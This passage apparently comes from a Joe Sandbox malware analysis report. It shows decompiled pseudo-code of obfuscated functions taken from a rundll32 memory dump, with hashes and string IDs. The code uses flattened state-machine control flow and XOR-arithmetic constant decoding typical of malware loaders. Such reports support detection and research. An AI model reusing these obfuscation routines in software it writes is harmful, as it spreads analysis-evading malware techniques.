                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t307 == 0x94a3104) {
                                                                                                                      								E00346E34(_v132, _v72, _v108, _v140);
                                                                                                                      							} else {
                                                                                                                      								if(_t307 != 0xc36eaf9) {
                                                                                                                      									goto L9;
                                                                                                                      								} else {
                                                                                                                      									_t307 = 0x8a4f536;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L12:
                                                                                                                      						return _t335;
                                                                                                                      					}
                                                                                                                      					_push(_v128);
                                                                                                                      					_push(_v96);
                                                                                                                      					_push(_v168);
                                                                                                                      					_push(_v88);
                                                                                                                      					_t308 = 0x44;
                                                                                                                      					E00361310(_t308,  &_v68);
                                                                                                                      					_push(_v152);
                                                                                                                      					_v68 = 0x44;
                                                                                                                      					_push(_v100);
                                                                                                                      					_t309 = _v136;
                                                                                                                      					_push(0x341800);
                                                                                                                      					_v60 = E0034AB66(_v136, _v160, __eflags);
                                                                                                                      					__eflags = _v176 | _v124;
                                                                                                                      					_t335 = E0035C8BD(_v92, _v136, _v80, _v136, _t309, _v164, _v76, _a20, _v116, _t334, _a28, _v172, _v176 | _v124, 0, _v112,  &_v68, _v72, _v104);
                                                                                                                      					E0034AE03(_v84, _v148, _v156, _v60);
                                                                                                                      					_t338 =  &(_t338[0x1a]);
                                                                                                                      					_t307 = 0x94a3104;
                                                                                                                      					L9:
                                                                                                                      					__eflags = _t307 - 0xce6287b;
                                                                                                                      				} while (_t307 != 0xce6287b);
                                                                                                                      				goto L12;
                                                                                                                      			}

                                                                                                                      0x003539bb
                                                                                                                      0x003539c3
                                                                                                                      0x003539d8
                                                                                                                      0x003539e0
                                                                                                                      0x003539e4
                                                                                                                      0x003539f1
                                                                                                                      0x003539f5
                                                                                                                      0x003539fd
                                                                                                                      0x003539fd
                                                                                                                      0x00353a03
                                                                                                                      0x00353a35
                                                                                                                      0x00353a3a
                                                                                                                      0x00353a3d
                                                                                                                      0x00353a3f
                                                                                                                      0x00353a45
                                                                                                                      0x00000000
                                                                                                                      0x00353a45
                                                                                                                      0x00353a05
                                                                                                                      0x00353a0b
                                                                                                                      0x00353b31
                                                                                                                      0x00353a11
                                                                                                                      0x00353a17
                                                                                                                      0x00000000
                                                                                                                      0x00353a1d
                                                                                                                      0x00353a1d
                                                                                                                      0x00000000
                                                                                                                      0x00353a1d
                                                                                                                      0x00353a17
                                                                                                                      0x00353a0b
                                                                                                                      0x00353b39
                                                                                                                      0x00353b44
                                                                                                                      0x00353b44
                                                                                                                      0x00353a49
                                                                                                                      0x00353a54
                                                                                                                      0x00353a58
                                                                                                                      0x00353a5c
                                                                                                                      0x00353a62
                                                                                                                      0x00353a63
                                                                                                                      0x00353a68
                                                                                                                      0x00353a6c
                                                                                                                      0x00353a77
                                                                                                                      0x00353a7f
                                                                                                                      0x00353a83
                                                                                                                      0x00353a90
                                                                                                                      0x00353aac
                                                                                                                      0x00353af2
                                                                                                                      0x00353b03
                                                                                                                      0x00353b08
                                                                                                                      0x00353b0b
                                                                                                                      0x00353b10
                                                                                                                      0x00353b10
                                                                                                                      0x00353b10
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *$D$[V$lP$s/?$E
                                                                                                                      • API String ID: 0-4039435091
                                                                                                                      • Opcode ID: eefc1b96b308f5dd0d284d42c9b9e23fd3ef24c524faf0b115ccada09164afb0
                                                                                                                      • Instruction ID: 9829a83dc334245f6c5c8dadc4e73aa8e3202a60846d179dc031ee0c6ea672bd
                                                                                                                      • Opcode Fuzzy Hash: eefc1b96b308f5dd0d284d42c9b9e23fd3ef24c524faf0b115ccada09164afb0
                                                                                                                      • Instruction Fuzzy Hash: F9C11F715083809FD365CF64C98AA1BFBE1FBD8748F509A1DF6958A260C7B98948CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E003488F4(void* __ecx) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				signed int _v1564;
                                                                                                                      				signed int _v1568;
                                                                                                                      				signed int _v1572;
                                                                                                                      				signed int _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _t258;
                                                                                                                      				signed int _t271;
                                                                                                                      				signed int _t272;
                                                                                                                      				signed int _t273;
                                                                                                                      				signed int _t274;
                                                                                                                      				signed int _t275;
                                                                                                                      				signed int _t276;
                                                                                                                      				void* _t303;
                                                                                                                      				void* _t304;
                                                                                                                      				signed int* _t307;
                                                                                                                      
                                                                                                                      				_t307 =  &_v1668;
                                                                                                                      				_v1644 = 0x34739e;
                                                                                                                      				_v1644 = _v1644 * 0x43;
                                                                                                                      				_t303 = __ecx;
                                                                                                                      				_v1644 = _v1644 >> 0xb;
                                                                                                                      				_t304 = 0x422d362;
                                                                                                                      				_t271 = 0x7d;
                                                                                                                      				_v1644 = _v1644 / _t271;
                                                                                                                      				_v1644 = _v1644 ^ 0x00084d9c;
                                                                                                                      				_v1612 = 0xb20ebf;
                                                                                                                      				_v1612 = _v1612 << 0xe;
                                                                                                                      				_v1612 = _v1612 ^ 0x83a04dde;
                                                                                                                      				_v1580 = 0xaa66ba;
                                                                                                                      				_v1580 = _v1580 + 0xffff0111;
                                                                                                                      				_v1580 = _v1580 ^ 0x00ac31ef;
                                                                                                                      				_v1604 = 0x4a91ac;
                                                                                                                      				_v1604 = _v1604 | 0x86032005;
                                                                                                                      				_v1604 = _v1604 ^ 0x86453654;
                                                                                                                      				_v1660 = 0x3cdcbf;
                                                                                                                      				_t272 = 0x34;
                                                                                                                      				_v1660 = _v1660 / _t272;
                                                                                                                      				_v1660 = _v1660 << 9;
                                                                                                                      				_t273 = 0x19;
                                                                                                                      				_v1660 = _v1660 * 0x33;
                                                                                                                      				_v1660 = _v1660 ^ 0x776ddfce;
                                                                                                                      				_v1620 = 0xfdfe87;
                                                                                                                      				_v1620 = _v1620 | 0x8debc5e9;
                                                                                                                      				_v1620 = _v1620 ^ 0x8df4241a;
                                                                                                                      				_v1596 = 0xc5e4de;
                                                                                                                      				_v1596 = _v1596 / _t273;
                                                                                                                      				_v1596 = _v1596 ^ 0x000ab9e2;
                                                                                                                      				_v1568 = 0x4c47da;
                                                                                                                      				_v1568 = _v1568 + 0x5d3c;
                                                                                                                      				_v1568 = _v1568 ^ 0x0043a9f3;
                                                                                                                      				_v1564 = 0xed5f6a;
                                                                                                                      				_t274 = 0x2a;
                                                                                                                      				_v1564 = _v1564 / _t274;
                                                                                                                      				_v1564 = _v1564 ^ 0x00049b09;
                                                                                                                      				_v1588 = 0xe27f75;
                                                                                                                      				_t275 = 0x68;
                                                                                                                      				_v1588 = _v1588 * 0x15;
                                                                                                                      				_v1588 = _v1588 ^ 0x129f57f0;
                                                                                                                      				_v1572 = 0x58913e;
                                                                                                                      				_v1572 = _v1572 + 0xffff0520;
                                                                                                                      				_v1572 = _v1572 ^ 0x005b93ab;
                                                                                                                      				_v1648 = 0xac4e73;
                                                                                                                      				_v1648 = _v1648 >> 8;
                                                                                                                      				_v1648 = _v1648 >> 0x10;
                                                                                                                      				_v1648 = _v1648 << 3;
                                                                                                                      				_v1648 = _v1648 ^ 0x000ac3bf;
                                                                                                                      				_v1668 = 0x5a6a4e;
                                                                                                                      				_t90 =  &_v1668; // 0x5a6a4e
                                                                                                                      				_v1668 =  *_t90 * 0x58;
                                                                                                                      				_t92 =  &_v1668; // 0x5a6a4e
                                                                                                                      				_v1668 =  *_t92 / _t275;
                                                                                                                      				_v1668 = _v1668 << 1;
                                                                                                                      				_v1668 = _v1668 ^ 0x009738dd;
                                                                                                                      				_v1640 = 0x7a6607;
                                                                                                                      				_t276 = 0x65;
                                                                                                                      				_v1640 = _v1640 * 0xa;
                                                                                                                      				_v1640 = _v1640 >> 9;
                                                                                                                      				_v1640 = _v1640 | 0xf246f931;
                                                                                                                      				_v1640 = _v1640 ^ 0xf242cc5d;
                                                                                                                      				_v1628 = 0xa390c8;
                                                                                                                      				_v1628 = _v1628 << 0xf;
                                                                                                                      				_v1628 = _v1628 ^ 0x3ac7d651;
                                                                                                                      				_v1628 = _v1628 ^ 0xf2afedad;
                                                                                                                      				_v1652 = 0x2d980b;
                                                                                                                      				_v1652 = _v1652 * 0x71;
                                                                                                                      				_v1652 = _v1652 * 0x17;
                                                                                                                      				_v1652 = _v1652 ^ 0x28f4da4d;
                                                                                                                      				_v1652 = _v1652 ^ 0xe6141d35;
                                                                                                                      				_v1636 = 0x37785c;
                                                                                                                      				_v1636 = _v1636 + 0xffffcffd;
                                                                                                                      				_v1636 = _v1636 ^ 0x6b7d5c73;
                                                                                                                      				_v1636 = _v1636 ^ 0x6b457d84;
                                                                                                                      				_v1616 = 0xb1620;
                                                                                                                      				_v1616 = _v1616 << 0x10;
                                                                                                                      				_v1616 = _v1616 ^ 0x162b8e46;
                                                                                                                      				_v1632 = 0x4c47;
                                                                                                                      				_v1632 = _v1632 + 0xffffc0f0;
                                                                                                                      				_v1632 = _v1632 + 0xffffd3bf;
                                                                                                                      				_v1632 = _v1632 ^ 0xfff44e1b;
                                                                                                                      				_v1664 = 0xa6b80c;
                                                                                                                      				_v1664 = _v1664 + 0xf763;
                                                                                                                      				_v1664 = _v1664 * 0x6e;
                                                                                                                      				_v1664 = _v1664 / _t276;
                                                                                                                      				_v1664 = _v1664 ^ 0x00b9c638;
                                                                                                                      				_v1600 = 0xaa0054;
                                                                                                                      				_v1600 = _v1600 ^ 0xf2e3595a;
                                                                                                                      				_v1600 = _v1600 ^ 0xf24e3ce3;
                                                                                                                      				_v1608 = 0x669547;
                                                                                                                      				_v1608 = _v1608 + 0xe3ee;
                                                                                                                      				_v1608 = _v1608 ^ 0x0066aeed;
                                                                                                                      				_v1656 = 0xf50b8d;
                                                                                                                      				_v1656 = _v1656 + 0xffffe5b9;
                                                                                                                      				_v1656 = _v1656 * 0x19;
                                                                                                                      				_v1656 = _v1656 * 0x2c;
                                                                                                                      				_v1656 = _v1656 ^ 0x1c789090;
                                                                                                                      				_v1576 = 0xf13773;
                                                                                                                      				_v1576 = _v1576 | 0xffe45fc0;
                                                                                                                      				_v1576 = _v1576 ^ 0xfffeb9af;
                                                                                                                      				_v1624 = 0xc714fc;
                                                                                                                      				_v1624 = _v1624 << 7;
                                                                                                                      				_v1624 = _v1624 * 0x4d;
                                                                                                                      				_v1624 = _v1624 ^ 0xf0acb0c0;
                                                                                                                      				_v1584 = 0x43b9ac;
                                                                                                                      				_v1584 = _v1584 + 0xfffff1bc;
                                                                                                                      				_v1584 = _v1584 ^ 0x004aa621;
                                                                                                                      				_v1592 = 0x5bf493;
                                                                                                                      				_t258 = _v1592 * 0x43;
                                                                                                                      				_v1592 = _t258;
                                                                                                                      				_v1592 = _v1592 ^ 0x181e9f62;
                                                                                                                      				while(_t304 != 0x2953b22) {
                                                                                                                      					if(_t304 == 0x422d362) {
                                                                                                                      						_t304 = 0xe704baa;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						_t312 = _t304 - 0xe704baa;
                                                                                                                      						if(_t304 != 0xe704baa) {
                                                                                                                      							L8:
                                                                                                                      							__eflags = _t304 - 0x740d40c;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							E003612A8(_t276, _v1644, _t312, _v1612, _v1580,  &_v1560);
                                                                                                                      							 *((short*)(E00354FA8(_v1604,  &_v1560, _v1660, _v1620))) = 0;
                                                                                                                      							E00348650(_v1596,  &_v520, _t312, _v1568);
                                                                                                                      							_push(_v1648);
                                                                                                                      							_push(_v1572);
                                                                                                                      							_push(0x34183c);
                                                                                                                      							E0034E7CE(E0034AB66(_v1564, _v1588, _t312), _t312, _v1668,  &_v1560, _v1564, _v1640, _v1628, _v1652, _v1636,  &_v520);
                                                                                                                      							E0034AE03(_v1616, _v1632, _v1664, _t264);
                                                                                                                      							_t276 = _v1600;
                                                                                                                      							_t258 = E0035C38F(_t276,  &_v1040, _t303, _v1608);
                                                                                                                      							_t307 =  &(_t307[0x15]);
                                                                                                                      							if(_t258 != 0) {
                                                                                                                      								_t304 = 0x2953b22;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t258;
                                                                                                                      				}
                                                                                                                      				_push(_v1592);
                                                                                                                      				_push(_v1584);
                                                                                                                      				_push(_v1624);
                                                                                                                      				_push( &_v1040);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_v1576);
                                                                                                                      				_push(_t276);
                                                                                                                      				_push(0);
                                                                                                                      				_t276 = 0;
                                                                                                                      				__eflags = 0;
                                                                                                                      				_t258 = E00349700(0, _v1656, 0);
                                                                                                                      				_t307 =  &(_t307[8]);
                                                                                                                      				_t304 = 0x740d40c;
                                                                                                                      				goto L8;
                                                                                                                      			}












































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <]$GL$NjZ$T$j_$s\}k
                                                                                                                      • API String ID: 0-1588241565
                                                                                                                      • Opcode ID: 8bf30cfddf8310c356da1ac5e4956eecff08760b2ad9b4cc132c7481cd103e21
                                                                                                                      • Instruction ID: 546c48bfe92b58ac2774b94d64814887bd0373cdcf31733bb2c9e4a74a36e98d
                                                                                                                      • Opcode Fuzzy Hash: 8bf30cfddf8310c356da1ac5e4956eecff08760b2ad9b4cc132c7481cd103e21
                                                                                                                      • Instruction Fuzzy Hash: 5AC1FE724093419FC369CF25C58A94BFBE1FBC4708F008A1DF5A69A260D7B59A19CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E003470ED() {
                                                                                                                      				char _v520;
                                                                                                                      				signed int _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				signed int _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _v540;
                                                                                                                      				signed int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				signed int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _v568;
                                                                                                                      				signed int _v572;
                                                                                                                      				signed int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				signed int _v584;
                                                                                                                      				signed int _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				signed int _v600;
                                                                                                                      				signed int _v604;
                                                                                                                      				signed int _v608;
                                                                                                                      				signed int _v612;
                                                                                                                      				signed int _t202;
                                                                                                                      				signed int _t203;
                                                                                                                      				void* _t204;
                                                                                                                      				intOrPtr _t209;
                                                                                                                      				intOrPtr _t216;
                                                                                                                      				void* _t218;
                                                                                                                      				intOrPtr _t224;
                                                                                                                      				intOrPtr _t236;
                                                                                                                      				signed int _t241;
                                                                                                                      				signed int _t242;
                                                                                                                      				signed int _t243;
                                                                                                                      				signed int _t244;
                                                                                                                      				void* _t246;
                                                                                                                      				signed int* _t248;
                                                                                                                      				void* _t251;
                                                                                                                      
                                                                                                                      				_t248 =  &_v612;
                                                                                                                      				_v540 = 0xdad4cc;
                                                                                                                      				_v540 = _v540 ^ 0x94191629;
                                                                                                                      				_t218 = 0x6f2f9f8;
                                                                                                                      				_v540 = _v540 ^ 0x94c3c2f9;
                                                                                                                      				_v544 = 0x76e0f0;
                                                                                                                      				_v544 = _v544 << 0x10;
                                                                                                                      				_v544 = _v544 ^ 0xe0f00029;
                                                                                                                      				_v536 = 0x3bc67a;
                                                                                                                      				_v536 = _v536 >> 0xc;
                                                                                                                      				_v536 = _v536 ^ 0x000f0383;
                                                                                                                      				_v568 = 0x8bde3b;
                                                                                                                      				_v568 = _v568 + 0xffff2322;
                                                                                                                      				_v568 = _v568 ^ 0x008d993e;
                                                                                                                      				_v596 = 0x92619;
                                                                                                                      				_v596 = _v596 ^ 0xd159791b;
                                                                                                                      				_v596 = _v596 + 0xffff3449;
                                                                                                                      				_v596 = _v596 | 0x988058a4;
                                                                                                                      				_v596 = _v596 ^ 0xd9ccc0e1;
                                                                                                                      				_v608 = 0xa06713;
                                                                                                                      				_t241 = 0x29;
                                                                                                                      				_v608 = _v608 / _t241;
                                                                                                                      				_v608 = _v608 ^ 0x6a345d45;
                                                                                                                      				_t246 = 0;
                                                                                                                      				_v608 = _v608 << 0xe;
                                                                                                                      				_v608 = _v608 ^ 0xed3298df;
                                                                                                                      				_v576 = 0x1c835f;
                                                                                                                      				_v576 = _v576 ^ 0xdf607740;
                                                                                                                      				_v576 = _v576 >> 0xb;
                                                                                                                      				_v576 = _v576 ^ 0x0012ec93;
                                                                                                                      				_v584 = 0x7ddda5;
                                                                                                                      				_t242 = 0x76;
                                                                                                                      				_v584 = _v584 / _t242;
                                                                                                                      				_v584 = _v584 | 0x464a7126;
                                                                                                                      				_v584 = _v584 ^ 0x4642215f;
                                                                                                                      				_v548 = 0x20374d;
                                                                                                                      				_t243 = 0x71;
                                                                                                                      				_v548 = _v548 * 0x6c;
                                                                                                                      				_v548 = _v548 ^ 0x0d9d239d;
                                                                                                                      				_v528 = 0x9116;
                                                                                                                      				_v528 = _v528 ^ 0x0b2a50da;
                                                                                                                      				_v528 = _v528 ^ 0x0b2b7a92;
                                                                                                                      				_v600 = 0xee9b3a;
                                                                                                                      				_v600 = _v600 | 0x1ae7cac3;
                                                                                                                      				_v600 = _v600 + 0x2aec;
                                                                                                                      				_v600 = _v600 | 0xe5d5fb71;
                                                                                                                      				_v600 = _v600 ^ 0xfffe899a;
                                                                                                                      				_v556 = 0x2fd7b1;
                                                                                                                      				_v556 = _v556 / _t243;
                                                                                                                      				_v556 = _v556 ^ 0x0001ae08;
                                                                                                                      				_v552 = 0xd06bd7;
                                                                                                                      				_v552 = _v552 + 0x9aba;
                                                                                                                      				_v552 = _v552 ^ 0x00dba68b;
                                                                                                                      				_v560 = 0x3f6698;
                                                                                                                      				_v560 = _v560 ^ 0x9e976c20;
                                                                                                                      				_v560 = _v560 ^ 0x9ea088a0;
                                                                                                                      				_v564 = 0xf04caf;
                                                                                                                      				_v564 = _v564 << 0xc;
                                                                                                                      				_v564 = _v564 ^ 0x04c86801;
                                                                                                                      				_v532 = 0x4abe1e;
                                                                                                                      				_v532 = _v532 + 0xffff7e54;
                                                                                                                      				_v532 = _v532 ^ 0x0047677c;
                                                                                                                      				_v592 = 0xfc3d76;
                                                                                                                      				_v592 = _v592 >> 4;
                                                                                                                      				_t244 = 0x67;
                                                                                                                      				_t245 = _v524;
                                                                                                                      				_v592 = _v592 / _t244;
                                                                                                                      				_v592 = _v592 ^ 0x0e63bcd1;
                                                                                                                      				_v592 = _v592 ^ 0x0e6c0c0a;
                                                                                                                      				_v580 = 0x87074e;
                                                                                                                      				_v580 = _v580 + 0x3b8f;
                                                                                                                      				_v580 = _v580 + 0xffffa265;
                                                                                                                      				_v580 = _v580 ^ 0x008cb1a6;
                                                                                                                      				_v588 = 0xe717aa;
                                                                                                                      				_v588 = _v588 | 0xfff18f7b;
                                                                                                                      				_v588 = _v588 >> 0xb;
                                                                                                                      				_v588 = _v588 ^ 0x001226f1;
                                                                                                                      				_v604 = 0x61f630;
                                                                                                                      				_v604 = _v604 | 0xec5f2186;
                                                                                                                      				_v604 = _v604 ^ 0x97c62f9e;
                                                                                                                      				_v604 = _v604 ^ 0x80f94e8c;
                                                                                                                      				_v604 = _v604 ^ 0xfb4d53d4;
                                                                                                                      				_v612 = 0x890e92;
                                                                                                                      				_v612 = _v612 >> 9;
                                                                                                                      				_v612 = _v612 + 0xf9d4;
                                                                                                                      				_v612 = _v612 + 0xffff7e3c;
                                                                                                                      				_v612 = _v612 ^ 0x000167a4;
                                                                                                                      				_v572 = 0xa3f922;
                                                                                                                      				_v572 = _v572 << 1;
                                                                                                                      				_v572 = _v572 + 0x9b39;
                                                                                                                      				_v572 = _v572 ^ 0x014464a5;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t251 = _t218 - 0xaf66d96;
                                                                                                                      						if(_t251 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t251 == 0) {
                                                                                                                      							_push(_t218);
                                                                                                                      							_t236 =  *0x36520c; // 0x0
                                                                                                                      							_t203 = E0034EA7B(_t236 + 8, _v552, _v524, _t218, _v560, _v564, _v532);
                                                                                                                      							_t248 =  &(_t248[7]);
                                                                                                                      							_t218 = 0xbcbad55;
                                                                                                                      							__eflags = _t203;
                                                                                                                      							_t204 = 1;
                                                                                                                      							_t246 =  ==  ? _t204 : _t246;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t218 == 0x1700698) {
                                                                                                                      							E0035E689(_v548, _v528, _v600, _t245, _v556);
                                                                                                                      							_t248 =  &(_t248[3]);
                                                                                                                      							L9:
                                                                                                                      							_t218 = 0xaf66d96;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t218 == 0x4f7449d) {
                                                                                                                      							_v524 = _v540;
                                                                                                                      							goto L9;
                                                                                                                      						}
                                                                                                                      						if(_t218 == 0x51416c3) {
                                                                                                                      							E003612A8(_t218, _v592, __eflags, _v580, _v588,  &_v520);
                                                                                                                      							_t209 = E00347677( &_v520, _v604, _v612, _v572);
                                                                                                                      							_t224 =  *0x36520c; // 0x0
                                                                                                                      							 *((intOrPtr*)(_t224 + 4)) = _t209;
                                                                                                                      							L23:
                                                                                                                      							return _t246;
                                                                                                                      						}
                                                                                                                      						if(_t218 != 0x6f2f9f8) {
                                                                                                                      							goto L20;
                                                                                                                      						}
                                                                                                                      						_push(_t218);
                                                                                                                      						_push(_t218);
                                                                                                                      						 *0x36520c = E00353512(0x444);
                                                                                                                      						_t218 = 0xcc58939;
                                                                                                                      					}
                                                                                                                      					__eflags = _t218 - 0xbcbad55;
                                                                                                                      					if(_t218 == 0xbcbad55) {
                                                                                                                      						E0034E86A();
                                                                                                                      						_t218 = 0x51416c3;
                                                                                                                      						goto L20;
                                                                                                                      					}
                                                                                                                      					__eflags = _t218 - 0xcc58939;
                                                                                                                      					if(_t218 == 0xcc58939) {
                                                                                                                      						_t202 = E0034EB36(_v576, _v584, _t218, _v536);
                                                                                                                      						_t245 = _t202;
                                                                                                                      						_t248 =  &(_t248[3]);
                                                                                                                      						__eflags = _t202;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							_t218 = 0x4f7449d;
                                                                                                                      						} else {
                                                                                                                      							_t216 =  *0x36520c; // 0x0
                                                                                                                      							 *((intOrPtr*)(_t216 + 0x438)) = 1;
                                                                                                                      							_t218 = 0xdbc7fda;
                                                                                                                      						}
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					__eflags = _t218 - 0xdbc7fda;
                                                                                                                      					if(__eflags != 0) {
                                                                                                                      						goto L20;
                                                                                                                      					}
                                                                                                                      					_t218 = 0x1700698;
                                                                                                                      					_v524 = _v544;
                                                                                                                      					goto L1;
                                                                                                                      					L20:
                                                                                                                      					__eflags = _t218 - 0xee3620e;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L23;
                                                                                                                      			}











































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$E]4j$M7 $_!BF$|gG$*
                                                                                                                      • API String ID: 0-1206799572
                                                                                                                      • Opcode ID: 079eded42a865de2cb2ad698981d5914da6a7ca3e19c88312669ce298bf79900
                                                                                                                      • Instruction ID: edfb6e61cf7d766a45f1a6abaeb4012698d6df48cfcba7dcf7f70ab1873b7b5e
                                                                                                                      • Opcode Fuzzy Hash: 079eded42a865de2cb2ad698981d5914da6a7ca3e19c88312669ce298bf79900
                                                                                                                      • Instruction Fuzzy Hash: C5A1327150C3819FD369CF25D48A82BBBF1FBC5758F20891DF6968A260D3B19949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E00355040(void* __ecx, void* __edx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _t222;
                                                                                                                      				signed int _t224;
                                                                                                                      				void* _t227;
                                                                                                                      				signed int _t229;
                                                                                                                      				signed int _t230;
                                                                                                                      				signed int _t231;
                                                                                                                      				signed int _t232;
                                                                                                                      				signed int _t233;
                                                                                                                      				signed int _t234;
                                                                                                                      				signed int _t235;
                                                                                                                      				void* _t261;
                                                                                                                      				void* _t262;
                                                                                                                      				signed int* _t264;
                                                                                                                      				signed int* _t265;
                                                                                                                      
                                                                                                                      				_t264 =  &_v80;
                                                                                                                      				_v64 = 0xca2d1a;
                                                                                                                      				_v64 = _v64 + 0xffff463a;
                                                                                                                      				_v64 = _v64 + 0xffffa2b5;
                                                                                                                      				_v64 = _v64 + 0xffffe441;
                                                                                                                      				_v64 = _v64 ^ 0x00ce8887;
                                                                                                                      				_v68 = 0xe757b6;
                                                                                                                      				_t261 = __edx;
                                                                                                                      				_t227 = __ecx;
                                                                                                                      				_t262 = 0xd46e588;
                                                                                                                      				_t229 = 0x7b;
                                                                                                                      				_v68 = _v68 / _t229;
                                                                                                                      				_v68 = _v68 | 0x2f3c6c23;
                                                                                                                      				_v68 = _v68 << 5;
                                                                                                                      				_v68 = _v68 ^ 0xe7b70971;
                                                                                                                      				_v72 = 0xa66d67;
                                                                                                                      				_v72 = _v72 + 0xffff9e81;
                                                                                                                      				_v72 = _v72 + 0xffffa01d;
                                                                                                                      				_v72 = _v72 + 0xd858;
                                                                                                                      				_v72 = _v72 ^ 0x00aeb203;
                                                                                                                      				_v76 = 0xda65d9;
                                                                                                                      				_v76 = _v76 | 0x06c15440;
                                                                                                                      				_v76 = _v76 + 0x3ac0;
                                                                                                                      				_t230 = 0x31;
                                                                                                                      				_v76 = _v76 * 0x17;
                                                                                                                      				_v76 = _v76 ^ 0x9dbea6d5;
                                                                                                                      				_v28 = 0xef7021;
                                                                                                                      				_v28 = _v28 + 0xc1df;
                                                                                                                      				_v28 = _v28 ^ 0x38dac4ec;
                                                                                                                      				_v28 = _v28 ^ 0x38291ca9;
                                                                                                                      				_v56 = 0xd77e5;
                                                                                                                      				_v56 = _v56 | 0x9f6ff94e;
                                                                                                                      				_v56 = _v56 / _t230;
                                                                                                                      				_v56 = _v56 ^ 0x034debba;
                                                                                                                      				_v32 = 0x5c0433;
                                                                                                                      				_t231 = 0x4c;
                                                                                                                      				_v32 = _v32 / _t231;
                                                                                                                      				_t232 = 0x38;
